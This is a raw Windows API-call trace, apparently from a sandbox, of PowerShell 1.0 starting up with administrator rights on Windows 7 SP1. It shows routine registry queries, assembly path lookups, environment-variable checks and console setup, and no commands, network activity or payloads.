	[0563.142] CoTaskMemAlloc (cb=0x66) returned 0x30b0e0
	[0563.142] lstrcpyW (in: lpString1=0x30b0e0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0563.142] CoTaskMemFree (pv=0x30b0e0) 
	[0563.142] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12de98, puLen=0x12de90 | out: lplpBuffer=0x12de98*=0x0, puLen=0x12de90) returned 0
	[0563.142] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12de98, puLen=0x12de90 | out: lplpBuffer=0x12de98*=0x0, puLen=0x12de90) returned 0
	[0563.142] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12de98, puLen=0x12de90 | out: lplpBuffer=0x12de98*=0x0, puLen=0x12de90) returned 0
	[0563.142] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12de68, puLen=0x12de60 | out: lplpBuffer=0x12de68*=0x2c626ec, puLen=0x12de60) returned 1
	[0563.142] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0563.142] VerLanguageNameW (in: wLang=0x0, szLang=0x2a4bb0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0563.142] CoTaskMemFree (pv=0x2a4bb0) 
	[0563.142] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\", lplpBuffer=0x12deb8, puLen=0x12deb0 | out: lplpBuffer=0x12deb8*=0x2c62678, puLen=0x12deb0) returned 1
	[0563.151] CoTaskMemAlloc (cb=0x104) returned 0x311ea0
	[0563.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x311ea0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.151] CoTaskMemFree (pv=0x311ea0) 
	[0563.156] CoTaskMemAlloc (cb=0x104) returned 0x311ea0
	[0563.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x311ea0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.156] CoTaskMemFree (pv=0x311ea0) 
	[0563.160] lstrlenW (lpString="䅁") returned 1
	[0564.562] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dd88 | out: phkResult=0x12dd88*=0x2f8) returned 0x0
	[0564.564] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dd78 | out: phkResult=0x12dd78*=0x2fc) returned 0x0
	[0564.564] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12de08 | out: phkResult=0x12de08*=0x300) returned 0x0
	[0564.569] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dd4c, lpData=0x0, lpcbData=0x12dd48*=0x0 | out: lpType=0x12dd4c*=0x1, lpData=0x0, lpcbData=0x12dd48*=0x56) returned 0x0
	[0564.570] CoTaskMemAlloc (cb=0x5a) returned 0x30b070
	[0564.570] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dd1c, lpData=0x30b070, lpcbData=0x12dd18*=0x56 | out: lpType=0x12dd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12dd18*=0x56) returned 0x0
	[0564.570] CoTaskMemFree (pv=0x30b070) 
	[0564.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0564.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0564.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0565.861] CoTaskMemAlloc (cb=0x104) returned 0x266f50
	[0565.861] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x266f50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.861] CoTaskMemFree (pv=0x266f50) 
	[0571.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0571.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0574.740] CoTaskMemAlloc (cb=0x104) returned 0x2bd720
	[0574.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bd720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.740] CoTaskMemFree (pv=0x2bd720) 
	[0574.742] CoTaskMemAlloc (cb=0x104) returned 0x319ed0
	[0574.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x319ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.743] CoTaskMemFree (pv=0x319ed0) 
	[0576.211] CoTaskMemAlloc (cb=0x104) returned 0x319ed0
	[0576.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x319ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.211] CoTaskMemFree (pv=0x319ed0) 
	[0576.213] CoTaskMemAlloc (cb=0x104) returned 0x319ed0
	[0576.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x319ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.213] CoTaskMemFree (pv=0x319ed0) 
	[0576.213] CoTaskMemAlloc (cb=0x104) returned 0x319ed0
	[0576.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x319ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.213] CoTaskMemFree (pv=0x319ed0) 
	[0581.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0581.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0583.009] CoTaskMemAlloc (cb=0x104) returned 0x319ed0
	[0583.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x319ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0583.009] CoTaskMemFree (pv=0x319ed0) 
	[0583.012] CoTaskMemAlloc (cb=0x104) returned 0x319ed0
	[0583.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x319ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0583.012] CoTaskMemFree (pv=0x319ed0) 
	[0586.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0586.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0595.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0595.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0608.923] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0608.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0608.924] CoTaskMemFree (pv=0x31a0f0) 
	[0608.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0608.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0608.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0608.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0610.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0610.012] SetErrorMode (uMode=0x1) returned 0x1
	[0610.012] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12dce0 | out: lpFileInformation=0x12dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0610.012] SetErrorMode (uMode=0x1) returned 0x1
	[0613.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0613.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0613.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0613.030] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0613.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.030] CoTaskMemFree (pv=0x31a0f0) 
	[0613.036] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0613.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.037] CoTaskMemFree (pv=0x31a0f0) 
	[0613.037] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0613.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.037] CoTaskMemFree (pv=0x31a0f0) 
	[0613.040] CoCreateGuid (in: pguid=0x12e0a8 | out: pguid=0x12e0a8*(Data1=0x3ba08fb1, Data2=0x7ae7, Data3=0x4e67, Data4=([0]=0xaf, [1]=0xf5, [2]=0xc9, [3]=0x45, [4]=0x11, [5]=0x86, [6]=0xbe, [7]=0xd7))) returned 0x0
	[0613.043] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0613.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.043] CoTaskMemFree (pv=0x31a0f0) 
	[0613.046] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0613.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.046] CoTaskMemFree (pv=0x31a0f0) 
	[0613.049] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0613.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.049] CoTaskMemFree (pv=0x31a0f0) 
	[0613.060] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0614.123] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12dd50 | out: lpConsoleScreenBufferInfo=0x12dd50) returned 1
	[0614.135] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0614.136] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12dd50 | out: lpConsoleScreenBufferInfo=0x12dd50) returned 1
	[0614.137] GetVersionExW (in: lpVersionInformation=0x12dce0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dce0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0614.142] GetCurrentProcess () returned 0xffffffffffffffff
	[0614.143] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x12dd78 | out: TokenHandle=0x12dd78*=0x318) returned 1
	[0614.147] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12dc98 | out: TokenInformation=0x0, ReturnLength=0x12dc98) returned 0
	[0614.148] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2672e0
	[0614.148] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x2672e0, TokenInformationLength=0x4, ReturnLength=0x12dc98 | out: TokenInformation=0x2672e0, ReturnLength=0x12dc98) returned 1
	[0614.150] DuplicateTokenEx (in: hExistingToken=0x318, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12ddf8 | out: phNewToken=0x12ddf8*=0x314) returned 1
	[0614.150] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12dc98 | out: TokenInformation=0x0, ReturnLength=0x12dc98) returned 0
	[0614.150] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x267290
	[0614.150] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x267290, TokenInformationLength=0x4, ReturnLength=0x12dc98 | out: TokenInformation=0x267290, ReturnLength=0x12dc98) returned 1
	[0614.151] CheckTokenMembership (in: TokenHandle=0x314, SidToCheck=0x2d3d3f8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12de08 | out: IsMember=0x12de08) returned 1
	[0614.151] CloseHandle (hObject=0x314) returned 1
	[0614.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0614.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0614.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0614.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.085] CoTaskMemAlloc (cb=0x804) returned 0x1b7a3e10
	[0615.086] GetConsoleTitleW (in: lpConsoleTitle=0x1b7a3e10, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0615.087] CoTaskMemFree (pv=0x1b7a3e10) 
	[0615.936] CoTaskMemAlloc (cb=0x804) returned 0x1b7a46c0
	[0615.936] GetConsoleTitleW (in: lpConsoleTitle=0x1b7a46c0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0615.936] CoTaskMemFree (pv=0x1b7a46c0) 
	[0615.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.939] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0621.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
